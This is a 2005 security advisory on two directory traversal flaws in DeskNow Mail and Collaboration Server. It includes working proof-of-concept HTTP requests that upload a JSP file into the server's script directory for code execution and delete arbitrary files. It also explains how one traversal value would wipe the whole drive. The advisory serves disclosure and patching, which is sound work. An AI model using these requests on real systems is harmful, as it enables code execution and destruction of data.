Objectives About Us Sponsors News Past Events Contact Us
Login G-TEC CC Mirror Forums Links

 

 

SIG^2 Vulnerability Research Advisory

DeskNow Mail and Collaboration Server Directory Traversal Vulnerabilities

by Tan Chew Keong
Release Date: 02 Feb 2005

Summary

DeskNow Mail and Collaboration Server is a full-featured and integrated mail and instant messaging server, with webmail, secure instant messaging, document repository, shared calendars, address books, message boards, web-publishing, anti-spam features, Palm and PocketPC access and much more.

A directory traversal vulnerability was found in DeskNow webmail file attachment upload feature that may be exploited to upload files to arbitrary locations on the server. A malicious webmail user may upload a JSP file to the script directory of the server, and executing it by requesting the URL of the upload JSP file. A second directory traversal vulnerability exists in the document repository file delete feature. This vulnerability may be exploited to delete arbitrary files on the server.

 
Tested System

DeskNow Mail and Collaboration Server Version 2.5.12 on English Win2K SP4.

 
Details

On the Windows platform, the default installation of DeskNow Mail and Collaboration Server runs its webmail service using Tomcat Application Server with LOCAL SYSTEM privilege. This advisory documents two directory traversal vulnerabilities that may be exploited by a malicious webmail user to upload/delete files to/from arbitrary directories.

 
1. Insufficient input sanitization in attachment.do allows file upload to arbitrary directories.

DeskNow's webmail allows a logon mail user to upload file attachments when composing an email. Lack of sanitization of the input AttachmentsKey parameter allows the user to upload files to arbitrary location on the server. In particular, the value of the AttachmentsKey parameter is used to create a temporary directory where the uploaded file attachment will be saved. This directory name is relative to C:\desknowdata\userfolders\temp\username\

It is possible to use directory traversal characters to cause the uploaded file attachment to be saved outside the temporary directory. This may be exploited by a malicious webmail user to upload JSP files to the script execution directory of the server. After uploading the JSP file, it is possible to execute that file by directly requesting it's URL (i.e. http://[hostname]/desknow/jsp/test/poc.jsp). Successful exploitation will allow upload and execution of arbitrary JSP code with LOCAL SYSTEM privilege. E.g. a malicious user may upload a JSP file that gives him/her a reverse shell.

A sample malicious file upload HTTP request is shown below.

POST /desknow/attachment.do?Action=Upload&
     AttachmentsKey=../../../../../program%20files/desknow/webapps/desknow/jsp/test&Rnd=1019edc8ec1 HTTP/1.0
Host: localhost
Cookie: JSESSIONID=C4A8E16807E2CA492B0146CD0FF40FD0
Content-Type: multipart/form-data; boundary=---------------------------114782935826962
Content-Length: 226
Connection: Close

-----------------------------114782935826962
Content-Disposition: form-data; name="file1"; filename="p.jsp"
Content-Type: application/octet-stream

<%
out.write("Test");
%>
-----------------------------114782935826962--

When the user logs out or when he/she next logs in, all files and directories within the directory specified using the AttachmentsKey parameter will be recursively deleted. If the malicious user assigns the value of ../../../../../../../ to the AttachmentsKey parameter, the entire drive will be recursively DELETED when the user logs out or he/she next logs in.

 
2. Insufficient input sanitization in file.do allows deleting of arbitrary files.

DeskNow's document repository feature allows a user to store files on the server via the web interface. A user is allowed to delete his/her own files. When the user selects his own file to be deleted, the file name is sent using the select_file parameter as a POST request to file.do. It is possible to use directory traversal characters within this parameter to delete files that do not belong to the user.

A sample malicious file delete HTTP request is shown below.

POST /desknow/file.do?Action=DeleteGroup&IDFolder=102&Rnd=1019eea9da3 HTTP/1.0
Host: localhost
Cookie: JSESSIONID=54CDDCDFD228B0BEEE98D97A51CDD218
Content-Type: application/x-www-form-urlencoded
Content-Length: 166
Connection: Close

select1=0&select_file=../../../../../data/test.txt&IDFolderDest=0&select2=0&
select=file.do%3FAction%3DViewFolder%26IDFolder%3D102%26BlockSize%3D15%26Rnd%3D1019eea9da3

 
Patch

  1. Upgrade to DeskNow Mail and Collaboration Server Version 2.5.14 or later.

 
Disclosure Timeline

23 Jan 05 - Vulnerability Discovered.
24 Jan 05 - Initial Vendor Notification.
24 Jan 05 - Initial Vendor Reply.
25 Jan 05 - Vendor Released Version 2.5.13.
25 Jan 05 - Informed Vendor that Vulnerability is not Fully Fixed.
27 Jan 05 - Vendor Released Fixed Version 2.5.14.
02 Feb 05 - Public Release

 

Contacts

For further questions and enquries, email them to the following.

Overall-in-charge: Tan Chew Keong


Updated: 02/02/2005
webmaster@security.org.sg